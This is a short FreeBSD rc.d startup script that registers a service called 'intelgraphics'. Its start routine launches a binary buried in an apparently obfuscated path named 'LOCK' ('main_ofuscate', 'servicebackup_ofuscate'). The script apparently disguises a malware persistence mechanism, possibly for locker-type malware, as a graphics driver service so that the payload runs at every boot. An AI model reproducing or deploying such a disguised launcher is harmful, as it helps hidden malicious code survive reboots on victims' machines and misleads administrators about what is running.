#!/bin/sh

# PROVIDE: intelgraphics
# REQUIRE: LOGIN
# KEYWORD: shutdown

. /etc/rc.subr

name="intelgraphics"
rcvar="intelgraphics_enable"
start_cmd="${name}_start"
stop_cmd="${name}_stop"

intelgraphics_start() {
    echo "Starting intelgraphics"
    /LOCK/main/modules/main_ofuscate/servicebackup_ofuscate/freebsd_config/LOCK
}

intelgraphics_stop() {
    echo "Stopping intelgraphics"
    if [ -f /var/run/${name}.pid ]; then
        kill $(cat /var/run/${name}.pid)
        rm /var/run/${name}.pid
    fi
}

load_rc_config $name
run_rc_command "$1"
